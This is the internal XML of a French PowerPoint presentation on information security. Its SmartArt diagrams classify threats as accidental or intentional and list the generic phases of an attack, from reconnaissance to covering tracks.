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28.jpg" ContentType="image/png"/>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7" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="260" r:id="rId4"/>
    <p:sldId id="261" r:id="rId5"/>
    <p:sldId id="262" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="266" r:id="rId8"/>
    <p:sldId id="265"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8" r:id="rId23"/>
    <p:sldId id="289" r:id="rId24"/>
    <p:sldId id="290" r:id="rId25"/>
    <p:sldId id="291" r:id="rId26"/>
    <p:sldId id="280" r:id="rId27"/>
    <p:sldId id="281" r:id="rId28"/>
    <p:sldId id="282" r:id="rId29"/>
    <p:sldId id="283" r:id="rId30"/>
    <p:sldId id="284" r:id="rId31"/>
    <p:sldId id="286" r:id="rId32"/>
    <p:sldId id="292" r:id="rId33"/>
    <p:sldId id="293" r:id="rId34"/>
    <p:sldId id="294" r:id="rId35"/>
    <p:sldId id="295" r:id="rId36"/>
    <p:sldId id="296" r:id="rId37"/>
    <p:sldId id="297" r:id="rId38"/>
    <p:sldId id="298" r:id="rId39"/>
    <p:sldId id="299" r:id="rId40"/>
    <p:sldId id="300" r:id="rId41"/>
    <p:sldId id="301" r:id="rId42"/>
    <p:sldId id="302" r:id="rId43"/>
    <p:sldId id="305" r:id="rId44"/>
    <p:sldId id="342" r:id="rId45"/>
    <p:sldId id="343" r:id="rId46"/>
    <p:sldId id="339" r:id="rId47"/>
    <p:sldId id="303" r:id="rId48"/>
    <p:sldId id="344" r:id="rId49"/>
    <p:sldId id="306" r:id="rId50"/>
    <p:sldId id="307" r:id="rId51"/>
    <p:sldId id="309" r:id="rId52"/>
    <p:sldId id="315" r:id="rId53"/>
    <p:sldId id="321" r:id="rId54"/>
    <p:sldId id="322" r:id="rId55"/>
    <p:sldId id="316" r:id="rId56"/>
    <p:sldId id="320" r:id="rId57"/>
    <p:sldId id="323" r:id="rId58"/>
    <p:sldId id="308" r:id="rId59"/>
    <p:sldId id="312" r:id="rId60"/>
    <p:sldId id="310" r:id="rId61"/>
    <p:sldId id="313" r:id="rId62"/>
    <p:sldId id="314" r:id="rId63"/>
    <p:sldId id="324" r:id="rId64"/>
    <p:sldId id="326" r:id="rId65"/>
    <p:sldId id="325" r:id="rId66"/>
    <p:sldId id="332" r:id="rId67"/>
    <p:sldId id="334" r:id="rId68"/>
    <p:sldId id="329" r:id="rId69"/>
    <p:sldId id="330" r:id="rId70"/>
    <p:sldId id="331" r:id="rId71"/>
    <p:sldId id="335" r:id="rId72"/>
    <p:sldId id="336" r:id="rId73"/>
    <p:sldId id="337" r:id="rId74"/>
    <p:sldId id="338" r:id="rId7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47" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="93" d="100"/>
          <a:sy n="93" d="100"/>
        </p:scale>
        <p:origin x="12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F8979B-9565-4DBB-BCDD-8201928D639C}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2" loCatId="hierarchy" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple2" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful1" csCatId="colorful" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7608D3A5-3A88-4643-9626-FE828C96DD8C}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Les menaces</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D0F93AF6-8C75-4108-8B58-571411EE76E4}" type="parTrans" cxnId="{C7F686BC-9FDD-4792-862D-8AC9F1950DFC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FED938FD-BF83-45F1-9312-438EA1F2D0BA}" type="sibTrans" cxnId="{C7F686BC-9FDD-4792-862D-8AC9F1950DFC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AE74AC53-7C9B-4CDF-B6CD-B316A0852161}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Accidentelles</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{415C6CE7-1BAF-4F43-855D-762EDD0635AB}" type="parTrans" cxnId="{1222DDEE-1343-4F75-BB41-EA97F02D671C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B5715CE5-7077-49AD-A352-748D6D81B3DE}" type="sibTrans" cxnId="{1222DDEE-1343-4F75-BB41-EA97F02D671C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E771395B-3140-471D-AB27-4E114641E639}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Intentionnelles</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02E1E656-E060-4C1F-BF7A-85CDFDB2F9C4}" type="parTrans" cxnId="{F4BD67BA-8E89-4F43-963C-72BAC1A08528}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{54C0BE21-D1EA-44C8-9A7E-21E8AEBB7B94}" type="sibTrans" cxnId="{F4BD67BA-8E89-4F43-963C-72BAC1A08528}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E381C9BD-409C-4DEA-9935-5CDAA6B44984}" type="pres">
      <dgm:prSet presAssocID="{8CF8979B-9565-4DBB-BCDD-8201928D639C}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chPref val="1"/>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F85A7AF1-4C7A-4378-8BF6-FDE9EB61EC9E}" type="pres">
      <dgm:prSet presAssocID="{7608D3A5-3A88-4643-9626-FE828C96DD8C}" presName="root1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8016CF34-2E06-47DD-8393-5A2F896E37D1}" type="pres">
      <dgm:prSet presAssocID="{7608D3A5-3A88-4643-9626-FE828C96DD8C}" presName="LevelOneTextNode" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="1">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3BE54919-4831-4BC1-AB72-93EBFE19B19C}" type="pres">
      <dgm:prSet presAssocID="{7608D3A5-3A88-4643-9626-FE828C96DD8C}" presName="level2hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{252327F4-7BF0-4579-A661-BB886A7FB9BD}" type="pres">
      <dgm:prSet presAssocID="{415C6CE7-1BAF-4F43-855D-762EDD0635AB}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{42BC4919-73AF-41C5-B98C-CE8B0E6D3769}" type="pres">
      <dgm:prSet presAssocID="{415C6CE7-1BAF-4F43-855D-762EDD0635AB}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D675590-C77B-4278-8E56-6C033799C609}" type="pres">
      <dgm:prSet presAssocID="{AE74AC53-7C9B-4CDF-B6CD-B316A0852161}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AAE471D5-0819-4B85-BA6D-ADDE97EA8393}" type="pres">
      <dgm:prSet presAssocID="{AE74AC53-7C9B-4CDF-B6CD-B316A0852161}" presName="LevelTwoTextNode" presStyleLbl="node2" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6FA189F8-EE9A-4214-AA08-6A9C3B39B5DB}" type="pres">
      <dgm:prSet presAssocID="{AE74AC53-7C9B-4CDF-B6CD-B316A0852161}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F9CF5509-BA4E-41A4-8D2E-1670E2040EEC}" type="pres">
      <dgm:prSet presAssocID="{02E1E656-E060-4C1F-BF7A-85CDFDB2F9C4}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1AC19D86-8794-4BAD-AB1A-FFC55D5BDE4E}" type="pres">
      <dgm:prSet presAssocID="{02E1E656-E060-4C1F-BF7A-85CDFDB2F9C4}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{88F069A1-E2B1-4364-A02C-B4A45D389946}" type="pres">
      <dgm:prSet presAssocID="{E771395B-3140-471D-AB27-4E114641E639}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EEEDA4D4-903A-47F5-A3E4-7E2DE2AB69EA}" type="pres">
      <dgm:prSet presAssocID="{E771395B-3140-471D-AB27-4E114641E639}" presName="LevelTwoTextNode" presStyleLbl="node2" presStyleIdx="1" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B4421AD0-6476-4BFA-9C57-F187020F90A1}" type="pres">
      <dgm:prSet presAssocID="{E771395B-3140-471D-AB27-4E114641E639}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{C7F686BC-9FDD-4792-862D-8AC9F1950DFC}" srcId="{8CF8979B-9565-4DBB-BCDD-8201928D639C}" destId="{7608D3A5-3A88-4643-9626-FE828C96DD8C}" srcOrd="0" destOrd="0" parTransId="{D0F93AF6-8C75-4108-8B58-571411EE76E4}" sibTransId="{FED938FD-BF83-45F1-9312-438EA1F2D0BA}"/>
    <dgm:cxn modelId="{1222DDEE-1343-4F75-BB41-EA97F02D671C}" srcId="{7608D3A5-3A88-4643-9626-FE828C96DD8C}" destId="{AE74AC53-7C9B-4CDF-B6CD-B316A0852161}" srcOrd="0" destOrd="0" parTransId="{415C6CE7-1BAF-4F43-855D-762EDD0635AB}" sibTransId="{B5715CE5-7077-49AD-A352-748D6D81B3DE}"/>
    <dgm:cxn modelId="{207D1844-0DD9-4FBA-AA94-DA827F01EC51}" type="presOf" srcId="{7608D3A5-3A88-4643-9626-FE828C96DD8C}" destId="{8016CF34-2E06-47DD-8393-5A2F896E37D1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{5C271C02-C80D-4B61-BAB0-86220597FBA6}" type="presOf" srcId="{02E1E656-E060-4C1F-BF7A-85CDFDB2F9C4}" destId="{F9CF5509-BA4E-41A4-8D2E-1670E2040EEC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{C4A4CCD7-CB5B-4C1A-9BB2-B839815C6E50}" type="presOf" srcId="{8CF8979B-9565-4DBB-BCDD-8201928D639C}" destId="{E381C9BD-409C-4DEA-9935-5CDAA6B44984}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{9C374AA0-5597-4CE6-A961-25F6546E1325}" type="presOf" srcId="{E771395B-3140-471D-AB27-4E114641E639}" destId="{EEEDA4D4-903A-47F5-A3E4-7E2DE2AB69EA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{720734C2-610B-420A-B41E-AD97350ED2A9}" type="presOf" srcId="{AE74AC53-7C9B-4CDF-B6CD-B316A0852161}" destId="{AAE471D5-0819-4B85-BA6D-ADDE97EA8393}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{36845187-CA56-4B6B-8A94-88230E3E29B6}" type="presOf" srcId="{415C6CE7-1BAF-4F43-855D-762EDD0635AB}" destId="{42BC4919-73AF-41C5-B98C-CE8B0E6D3769}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{F4BD67BA-8E89-4F43-963C-72BAC1A08528}" srcId="{7608D3A5-3A88-4643-9626-FE828C96DD8C}" destId="{E771395B-3140-471D-AB27-4E114641E639}" srcOrd="1" destOrd="0" parTransId="{02E1E656-E060-4C1F-BF7A-85CDFDB2F9C4}" sibTransId="{54C0BE21-D1EA-44C8-9A7E-21E8AEBB7B94}"/>
    <dgm:cxn modelId="{4A5F4ADE-F505-46CE-9A50-D8D0B787AF2B}" type="presOf" srcId="{02E1E656-E060-4C1F-BF7A-85CDFDB2F9C4}" destId="{1AC19D86-8794-4BAD-AB1A-FFC55D5BDE4E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{8CCD521D-FF85-4340-A376-65498F6B8882}" type="presOf" srcId="{415C6CE7-1BAF-4F43-855D-762EDD0635AB}" destId="{252327F4-7BF0-4579-A661-BB886A7FB9BD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{99470072-A974-4A73-B67D-C245A680DC8B}" type="presParOf" srcId="{E381C9BD-409C-4DEA-9935-5CDAA6B44984}" destId="{F85A7AF1-4C7A-4378-8BF6-FDE9EB61EC9E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{1A5A8035-5615-41E8-9836-6171AFB8D659}" type="presParOf" srcId="{F85A7AF1-4C7A-4378-8BF6-FDE9EB61EC9E}" destId="{8016CF34-2E06-47DD-8393-5A2F896E37D1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{B01D5349-E1AD-48EA-9A81-A2296691ECC6}" type="presParOf" srcId="{F85A7AF1-4C7A-4378-8BF6-FDE9EB61EC9E}" destId="{3BE54919-4831-4BC1-AB72-93EBFE19B19C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{9CA1F2EF-2F6E-4950-B7B2-561B0EB0B6D4}" type="presParOf" srcId="{3BE54919-4831-4BC1-AB72-93EBFE19B19C}" destId="{252327F4-7BF0-4579-A661-BB886A7FB9BD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{08D09D30-27DD-485B-9516-988765EA88B6}" type="presParOf" srcId="{252327F4-7BF0-4579-A661-BB886A7FB9BD}" destId="{42BC4919-73AF-41C5-B98C-CE8B0E6D3769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{EE5E8550-4F43-436A-8535-5EFFD4D32761}" type="presParOf" srcId="{3BE54919-4831-4BC1-AB72-93EBFE19B19C}" destId="{0D675590-C77B-4278-8E56-6C033799C609}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{A9FA1A08-50FC-4DEC-B381-D045392E3D70}" type="presParOf" srcId="{0D675590-C77B-4278-8E56-6C033799C609}" destId="{AAE471D5-0819-4B85-BA6D-ADDE97EA8393}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{5877B78D-C0D8-41F8-A749-C2D42DC25C60}" type="presParOf" srcId="{0D675590-C77B-4278-8E56-6C033799C609}" destId="{6FA189F8-EE9A-4214-AA08-6A9C3B39B5DB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{B0B36829-4CB5-45D5-8E4F-9F408FFFE3F1}" type="presParOf" srcId="{3BE54919-4831-4BC1-AB72-93EBFE19B19C}" destId="{F9CF5509-BA4E-41A4-8D2E-1670E2040EEC}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{BFEC4949-F034-4C73-B683-AD5584CA3552}" type="presParOf" srcId="{F9CF5509-BA4E-41A4-8D2E-1670E2040EEC}" destId="{1AC19D86-8794-4BAD-AB1A-FFC55D5BDE4E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{CB78AB08-3C40-40CC-9E35-3DB4B5851472}" type="presParOf" srcId="{3BE54919-4831-4BC1-AB72-93EBFE19B19C}" destId="{88F069A1-E2B1-4364-A02C-B4A45D389946}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{73E54C0F-E70A-4B10-A31A-5A7A117191D5}" type="presParOf" srcId="{88F069A1-E2B1-4364-A02C-B4A45D389946}" destId="{EEEDA4D4-903A-47F5-A3E4-7E2DE2AB69EA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{4FAEAF91-133D-47E6-87A9-804EDD223F6B}" type="presParOf" srcId="{88F069A1-E2B1-4364-A02C-B4A45D389946}" destId="{B4421AD0-6476-4BFA-9C57-F187020F90A1}"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0F7228-2889-48D9-ACC0-7A71834A9652}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple5" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful5" csCatId="colorful" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6D2924A-1847-46A1-8B4A-03C6D7F052EE}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Reconnaissance</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{073FA647-C1D9-410C-879E-127C1A5245A1}" type="parTrans" cxnId="{5F6A0A35-9CDE-4DF8-B3F2-942F1C6D40E1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6352AB84-3F2F-4408-9943-43AFDA18732A}" type="sibTrans" cxnId="{5F6A0A35-9CDE-4DF8-B3F2-942F1C6D40E1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B1870CC2-3715-40DE-90E3-91650E582566}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Scanning</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE8AB162-28D1-49F2-8BC6-A25BF750AB33}" type="parTrans" cxnId="{DEF580C4-43C5-41F6-90F2-9C7401E9C1EF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8316352A-2AB9-4102-9CE9-A2B7AD1F66E2}" type="sibTrans" cxnId="{DEF580C4-43C5-41F6-90F2-9C7401E9C1EF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AEAAE3B3-0AFF-4EB3-A44B-85EBB224FBD1}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Gain d’accès</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41B7548C-A4DA-4042-9103-344451C70C25}" type="parTrans" cxnId="{B1464D1C-355F-4A57-B919-9317CDEA3427}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{396B2409-0B2E-4744-B2D0-4445B719A006}" type="sibTrans" cxnId="{B1464D1C-355F-4A57-B919-9317CDEA3427}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{297B26A6-E4F5-4525-99F1-366C8E8B391D}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Maintien de l’accès</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{77D19324-DD00-4354-823A-336DF5EC2429}" type="parTrans" cxnId="{74DE5FEE-AAC7-4A39-A285-A1CAA87664C4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C66A091-9558-4289-B1C4-D014376C0119}" type="sibTrans" cxnId="{74DE5FEE-AAC7-4A39-A285-A1CAA87664C4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{607267E5-C31F-423E-A1EC-58ADD6727254}">
      <dgm:prSet phldrT="[Texte]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Effacement de traces</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A66AB43-0110-45B4-94A1-84F0188886E7}" type="parTrans" cxnId="{901B448A-5389-4597-BB08-938489875294}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{124EB4D1-C356-4B39-9202-FC72E2AD83EE}" type="sibTrans" cxnId="{901B448A-5389-4597-BB08-938489875294}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:ln>
          <a:noFill/>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR" u="sng"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" type="pres">
      <dgm:prSet presAssocID="{A30F7228-2889-48D9-ACC0-7A71834A9652}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="7"/>
          <dgm:chPref val="7"/>
          <dgm:dir/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6659A5F0-439D-4464-9B15-96B622EDA5A5}" type="pres">
      <dgm:prSet presAssocID="{A30F7228-2889-48D9-ACC0-7A71834A9652}" presName="dot1" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="15"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EF3F40B7-DCAE-410A-B08A-DB239E7B8CEF}" type="pres">
      <dgm:prSet presAssocID="{A30F7228-2889-48D9-ACC0-7A71834A9652}" presName="dot2" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="15"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F2405C61-1B04-46F1-8F79-76B35B2378D7}" type="pres">
      <dgm:prSet presAssocID="{A30F7228-2889-48D9-ACC0-7A71834A9652}" presName="dot3" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="15"/>
      <dgm:spPr/>
    </dgm:pt>
